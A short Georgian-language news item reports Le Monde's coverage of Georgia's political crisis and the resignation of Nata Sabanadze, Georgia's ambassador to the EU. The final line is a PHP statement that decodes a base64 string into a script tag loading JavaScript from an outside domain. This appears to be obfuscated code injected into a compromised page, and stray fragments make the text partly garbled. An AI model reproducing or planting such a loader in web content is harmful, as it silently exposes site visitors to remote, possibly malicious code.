celsiusi
ავერსი შნაიდერი
გავლენიანი ფრანგული გამოცემა "ლე მონდი" საქართველოში არსებულ პოლიტიკურ კრიზისსა და ამ კრიზისში ევროკავშირის ჩართულობაზე სტატიას აქვეყნებს. გამოცემასთან საუბრისას, ევროკავშირში საქართველოს ყოფილი ელჩი ნატა საბანაძე, რომელმაც თანამდებობა ორი დღის წინ დატოვა, ადასტურებს, რომ "ბოლო რამდენიმე კვირის განმავლობაში, საქართველოს ხელისუფლებასთან უთანხმოება ჰქონდა".
 
ევროკავშირში საქართველოს ყოფილი ელჩი ძალიან გულდაწყვეტილია, რადგან ევროპულმა მედიაციამ შედეგი ვერ მოიტანა და იმედოვნებს, რომ მისი გადადგომა იქნება "გაფრთხილება" ორივე მხარისთვის, გამოსავლის მოსაძებნად. 
 
სტატიაში ასევე წერია, რომ ეს პირველი შემთხვევაა, როცა ევროკავშირი საქართველოს შიდა პოლიტიკური კრიზისის მოგვარებაში ასეთ დონეზე მონაწილეობს. ევროპელი დამკვირვებლები და ექსპერტები ამ კრიზისში მხოლოდ ერთ გამარჯვებულს ხედავენ - რუსეთს. საქართველოსთვის კი ეს კრიზისის ნატო-სთან და ევროკავშირთან დაახლოებას სათუოს ხდის.
 
შეგახსენებთ, რომ ევროკავშირში საქართველოს უკვე ყოფილი ელჩი, ნატა საბანაძე 21 მარტს გადადგა. 
1263
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");